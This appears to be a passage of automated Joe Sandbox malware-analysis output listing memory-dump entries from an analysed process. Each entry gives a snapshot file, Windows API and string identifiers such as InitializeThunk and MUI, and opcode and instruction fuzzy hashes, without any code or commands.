                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: 91bdfa61b8a0e810ec174431725312add0c46bad651738fa303b23d37fb63505
                                                • Instruction ID: cd5b13cd146aec8802ab59db9cd1e2b5a905611da4bc6a218c1f4915006d26fb
                                                • Opcode Fuzzy Hash: 91bdfa61b8a0e810ec174431725312add0c46bad651738fa303b23d37fb63505
                                                • Instruction Fuzzy Hash: 00616072E003099FEB15DFA8C844BAEBBF9FB48704F14446DEA59EB255D731AA40CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                • Opcode ID: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                • Instruction ID: fc34e15d1f17c03acce5b161a2afc7cf080d5e6bf77ebceb4df8b4ca8af2d50e
                                                • Opcode Fuzzy Hash: 31972d8d4cfc29f41193b0065d3c17de1916a6694a44d75512a94ba90a0db813
                                                • Instruction Fuzzy Hash: 3D512871E0021DAFDF11DFA9CC84BEEBBBDAB48754F100529E615F7291DA709A05CBA0
                                                Strings
                                                • kLsE, xrefs: 017A0540
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                • Instruction ID: e6cd202b16fc595f3a1bb8aed7baaa13bddfd9b978bb5464d4a3c53912e9dc2f
                                                • Opcode Fuzzy Hash: 917546f4b31fc088232d7f305954283a8be56573576591b95c124f2b2df73c8e
                                                • Instruction Fuzzy Hash: CC519A715047428FD724EF68C444AA7FBE4AFC4308F644E3EEAEA87241E770A545CB92
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                • Instruction ID: 0202c504af76c636a9454b9fda2ce6feb1891ddf0dba23fbd0ba0baf248917d2
                                                • Opcode Fuzzy Hash: b3c7ac52690a14b1b29e8c8109a116cac445f9a6f141aef4d83108eaa7bdfbb5
                                                • Instruction Fuzzy Hash: 7C41E130A04659DBEB12CF6DC894B6EBBB5FF85300F1441A5E900DB291E7B5DA40CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                • Instruction ID: 8449aaa76f2dc418e5a0ff2cb4cf5c349369a78130bda45f353e80901d28f71e
                                                • Opcode Fuzzy Hash: 71f7f20df48773cad8d19ec64af6a0565ecf4faa2b837760805c69c989191f11
                                                • Instruction Fuzzy Hash: DD01D1B2244708EFE311DF14CD49B26B7F8FB84715F058979A648C7190E374D904CB46
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                • Instruction ID: 94453ae562ebc6daa369c65ab1f43bdfcf6fc7832dea6bc3d6af40b7d38bd2e1
                                                • Opcode Fuzzy Hash: f739975bf6fac3474c5434adec5c5d54aef60fe0cc127983d1e6d5788b303409
                                                • Instruction Fuzzy Hash: 19827B75E002189FEB25CFA9C884BEDFBB5BF88310F548269E919AB751D7309981CF50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                • Instruction ID: 144ea78823a1c5e9a9e1a31fabaa4d8a1a1489511fe93c58af4001965c673129
                                                • Opcode Fuzzy Hash: 81d26b840519447bc9ffe8f7167022ad28e478fd7306f1eecf1e1b4874a7a4f1
                                                • Instruction Fuzzy Hash: CE916771900229AFEB22DF95CD85FAEBBB8EF18B50F204059F600EB195E774AD40CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                • Instruction ID: c5a932a9f97a0a17d4ed3a073443a91b40165407f69d3d7cc67cba4e84f9e376
                                                • Opcode Fuzzy Hash: 0b929f01adab17296cd7bdcf410082f34b5833e8697b454c69378c3a2ea4027d
                                                • Instruction Fuzzy Hash: 79918F3190061DABDB22ABA5DC88FAFBBB9FF45744F100029F501E7251EB389A01CB51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalTags
                                                • API String ID: 0-1106856819
                                                • Opcode ID: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                • Instruction ID: ae04b588e86351c7b0ac8a90374a4e18ff1a0bc04df4dcf791531cf0e3712640
                                                • Opcode Fuzzy Hash: f1910f47f154bd87cba8b63fa5de998ef2aef155c3ca05609311511262567f51
                                                • Instruction Fuzzy Hash: 08716FB6E0020ACFDF28CF9CD5906ADBBB5BF48710F24852EE945E7248E7719A41CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .mui
                                                • API String ID: 0-1199573805
                                                • Opcode ID: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                • Instruction ID: 7925e3e0f553ff873d11362ca8a676235e334398f0ada4693333bf3eab9ca0e5
                                                • Opcode Fuzzy Hash: 1294a8726cc965250e60ce7a57126f3cc2357d4d84c1545757750547eebad329
                                                • Instruction Fuzzy Hash: 12519172D0022E9BDF10DF99D844BAEFBB4AF08B54F054129EA11FB255DB349A01CBE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: EXT-
                                                • API String ID: 0-1948896318
                                                • Opcode ID: 14ef85546358eb54d8f67d53c7b3e6ec5c3b9e64b8a21e043d6c78847b6d9b8d
                                                • Instruction ID: b7d58deb7cc90963252eb6ac6c1b5ebeac5f0ec5234f305d9de43ae0b65d65ab
                                                • Opcode Fuzzy Hash: 14ef85546358eb54d8f67d53c7b3e6ec5c3b9e64b8a21e043d6c78847b6d9b8d
                                                • Instruction Fuzzy Hash: BA417072508342ABD711DA75D884BEBFBE8AF88B14F440A2DF684D7280EB74D944C796
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • Instruction Fuzzy Hash: 22715E71A00619EFDB11DFA9C984EEEBBB9FF48704F104569E505E7290DB34EA81CB90
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                • Instruction ID: a1cf12155d7e8569cd598223c8fdac86ed74613f2534952e7b0c11ba04466c19
                                                • Opcode Fuzzy Hash: 0b7b655eb6ae4a53f8e3c9d82a35521e2693f5d1a11da13658d4f5e8ead32da9
                                                • Instruction Fuzzy Hash: F271D232600701BFE7229F1CC888F56BBE6EF84724F284418E655C72A1E775EB44CB90
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                • Instruction ID: 22b55775cde257da6f576b8b14a9eac4bb85cb5675a94695855dde7c1bb2a4be
                                                • Opcode Fuzzy Hash: 3a72b5214f668d8c678c9589914308ab990c2a958dea7db92e9ff36dab04c801
                                                • Instruction Fuzzy Hash: 4C81B472A0431A8FDB25CF9CD988B6DF7B2BB88315F59422DD900AB295C7749E41CF90
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 11f3ca4532a018c796fed5b8f76e7060ce5ae096d68b7ef7b9f51648198e903d
                                                • Instruction ID: d9bb027364b709c0cbef45a0c577e0e2e1f7c053bb6bb2427f9e811f92db1430
                                                • Opcode Fuzzy Hash: 11f3ca4532a018c796fed5b8f76e7060ce5ae096d68b7ef7b9f51648198e903d
                                                • Instruction Fuzzy Hash: 8A710B71E00209AFDF16DF94C889FEEBBB9FB09354F104119E624E6290E774EA45CB90
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                • Instruction ID: 4f16ea754ab112880a6252b4fd1f3957aabe4082dbad0cc9c0fd0de2bf310e7d
                                                • Opcode Fuzzy Hash: 5ee303ed57e7dd4815320c239c8ec17ac8cb22e7a88bc824316ed4e2c7fc8804
                                                • Instruction Fuzzy Hash: 4151B172504612AFD755DEA8C8C8E5BBBE8EFC8754F010A29BE40DB150D770EE05C7A2
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                • Instruction ID: c7f2bb6004c0fa61e24827a0cbb34e8ab9be143c1776677e6f4eb98df38a10a5
                                                • Opcode Fuzzy Hash: eac05da19369b151bf52a059390daa3cb39114cc9c68006cdc9a56e26e154873
                                                • Instruction Fuzzy Hash: 4051E27090070DDFD721DF9AC884A6BFBF8BF55714F10461ED292976A1CBB0A645CB90
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                • Instruction ID: 4bb9fb800ad0ef84b05d5c21ed16c16b618a639b9b44c417d2f299d3d22c94f3
                                                • Opcode Fuzzy Hash: 2c166d8a15affc45525957b43856209f2ea6143c7c14a9ece3090e8dd8bdd29e
                                                • Instruction Fuzzy Hash: 07516B71600A09DFCB22EFA9C984EAAF3FDFB14784F400869E55297264DB34E940CB50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                • Instruction ID: 76aa8ba87efe7531d5cc89f928e4a294508dbeb3301e419670cca9d5e68085d6
                                                • Opcode Fuzzy Hash: f1d9544e4f2f1b1942f42587a48d041fa9f729ab742928bd77ef371e85ca2580
                                                • Instruction Fuzzy Hash: 5E517A7160834A9FD754DF29C881A6BBBE5BFC8708F44492DF599C7250EB30DA05CB52
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction ID: fe139c4e59eaa5f2d8ca23fd7855df1a8d449c637979eda8831b5fc7242be587
                                                • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                • Instruction Fuzzy Hash: C1519E75E0020AABDF16DF98C854BEEFBB5AF44B50F04406DEA12AB240D734DA44CBA0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                • Instruction ID: cdfe20228c017acb2551508324bb287b8f5d829c93d57fbcba95900efedb2eab
                                                • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                • Instruction Fuzzy Hash: 6A51D931D0022EEFDF22DB94C894BAEBBB8AF04314F154655D612F7190D7709F808BA5
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                • Instruction ID: ca50577f0b1e7ac633de54c38ebf3f43ec25d237ce48f8204c11b8177bccc015
                                                • Opcode Fuzzy Hash: 67a6187fc71e9a4e472952fd5efc229d6dc320be2ff41c14863814394e86e692
                                                • Instruction Fuzzy Hash: 1F41E3B07017019BD729DB2DC894B7BBB9EEF92320F188219E95DCB284DB30DA01C791
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                • Instruction ID: 6b6d29995038a7cb29f34cfc2778c516614fcd3e171e15f31d4af96b10bb0a71
                                                • Opcode Fuzzy Hash: 18a26b5eb8071550bab4d0fa4e3ddd1637967b850bd7097987841445ea4b6066
                                                • Instruction Fuzzy Hash: DE518F7190022ADFCB22DFA9C984AAEBBB9FF48354B644519D545E7305E730AE81CFD0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                • Instruction ID: c7f9569d8638651d9db483a5d2dcc9948999d35e4988f4a433d3a52826d7774f
                                                • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                • Instruction Fuzzy Hash: DD41E5316017169FD729CF28C984A6EB7ADFF80315B05466EE912DB644EB31EE04C7D0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                • Instruction ID: 3d913a2a7b2eb1399d72481caedbb91731d86efdc2b804843a16ac212867df9d
                                                • Opcode Fuzzy Hash: b835e1cfa0559e1fc730b4018c541360b9bdcf8864579848041d423eddf569f1
                                                • Instruction Fuzzy Hash: 25419B76D012199BDB14DF98C440AEEFBB4BF48710F14926EF915E7240DB35AD41CBA4
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                • Instruction ID: 50bc324ccacbb44569295e87da78ba602d169cadb4b8f689506b1e30240dca51
                                                • Opcode Fuzzy Hash: a92d9e885686a1c8579c06904da22c5051224726f5992e149b1eb4f8a7619a40
                                                • Instruction Fuzzy Hash: 6141C0712003069FD721DF28C884A6BFBE9FF88324F14486DEA57C7656EB35E9448B50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction ID: 6a0918a545b93b2b91861b06e5649af6fc9f3de040e2ddff4f116945d82fd594
                                                • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                • Instruction Fuzzy Hash: E9516C76A01255CFCB19CF98C580AADF7BAFF84710F2481A9D915E7355D730AE81CB90
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f203a4412fc7282e1ffed4eee2c1a39708f2d3331840173843cee9694cfe291
                                                • Instruction ID: 8d26c4c6182ed33e8867b7a5f622ad4ff196471e093bf7ab24cf892793a15abb
                                                • Opcode Fuzzy Hash: 0f203a4412fc7282e1ffed4eee2c1a39708f2d3331840173843cee9694cfe291
                                                • Instruction Fuzzy Hash: 7451187090420ADBDB269B28CC48BE8FBB1EF55314F1843A5E515E72D5E7346A81CF40
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33e6dcc19136cae27b02779c547435b2b506ffca41f8931eb2d07bdfdeb88659
                                                • Instruction ID: 2b9b2def0494248292c0768a20a53133328eaf43963ee9d1fcc4d0bf0cac641b
                                                • Opcode Fuzzy Hash: 33e6dcc19136cae27b02779c547435b2b506ffca41f8931eb2d07bdfdeb88659
                                                • Instruction Fuzzy Hash: 0D419531A002299FDB31DF68C944BEAF7B4EF45740F4105A9EA08AB395DB749E80CF91
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction ID: 12f32ef8132d3c450727c3a69d2b3e366a85322d3bb34ca1b0b529aec9992ba0
                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                • Instruction Fuzzy Hash: F0417275B10309ABEB15DF99CC94AAFBBBEAF89710F144069E908E7341DA74DF018760
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37a551ab21febd16ab2feba4a78f3812330f1b67795cb03c6b8c50ccd9202f7e
                                                • Instruction ID: 197f4375a2c1390a24900049efb03bbb17eed8ea1861d10ceae83fde0f43d688
                                                • Opcode Fuzzy Hash: 37a551ab21febd16ab2feba4a78f3812330f1b67795cb03c6b8c50ccd9202f7e
                                                • Instruction Fuzzy Hash: 3641BFB16007029FE325CF28C484A26FBF9FF88314B544A6DF54686A51E730F855CB90
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 79c17c9d6e715a0bb8c676d6b73085087eb79479ab4752167b846be43425c9e2
                                                • Instruction ID: 553922feab5e35d9449d2c9ec04991d7b321c7b74d6e85cc3913e4f93917dfa3
                                                • Opcode Fuzzy Hash: 79c17c9d6e715a0bb8c676d6b73085087eb79479ab4752167b846be43425c9e2
                                                • Instruction Fuzzy Hash: EA41C132940609CFDB21CF68E9887EEFBB0BB18716F18459DD411B7285EB349A41CF50
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4619f44da580e149e81190b7114e8f331147289ce47c8ac52267c2c71b2a85d3
                                                • Instruction ID: 52d846590ed7a167d245a2fe7245f2177cee34381c5b6116fece8f4cab8b37bd
                                                • Opcode Fuzzy Hash: 4619f44da580e149e81190b7114e8f331147289ce47c8ac52267c2c71b2a85d3
                                                • Instruction Fuzzy Hash: AD414532900206CFD725DF48C988B6AFBB2FBD8700F59826ED5019B259C374DA42CF91
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 210b3dc8de4cdb51e659ef430fdc395bf41f4bda0c0fed59bb3547b49d27d264
                                                • Instruction ID: 768579a09b27f443fa7f0a90a15771ec5643daa44cd94286f85839d0678317e5
                                                • Opcode Fuzzy Hash: 210b3dc8de4cdb51e659ef430fdc395bf41f4bda0c0fed59bb3547b49d27d264
                                                • Instruction Fuzzy Hash: E3416F325083069ED712DF65D840A6BF7E9EF89B54F40092EFA94D7250E731DE488BA3
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction ID: 78924b9e5583634430ad6c06fc42730a1370dcc7314dbba69fe91ce739b78538
                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                • Instruction Fuzzy Hash: 2D412431A05212DBDF25DE2CD484BBBFBB1EB90754F1580AEAA458B344E7328D84CB90
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1861898631.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_1770000_jlsvOH1c8bSRKqM.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1cf68133a9025dcb1788fa6969fc5dfec33c88fb7a29a26abca165b0c76b2006
                                                • Instruction ID: d9b202ec233fe8324d5240fdb686841d1b1b9457854e698e1772b6aa8aaccbdb
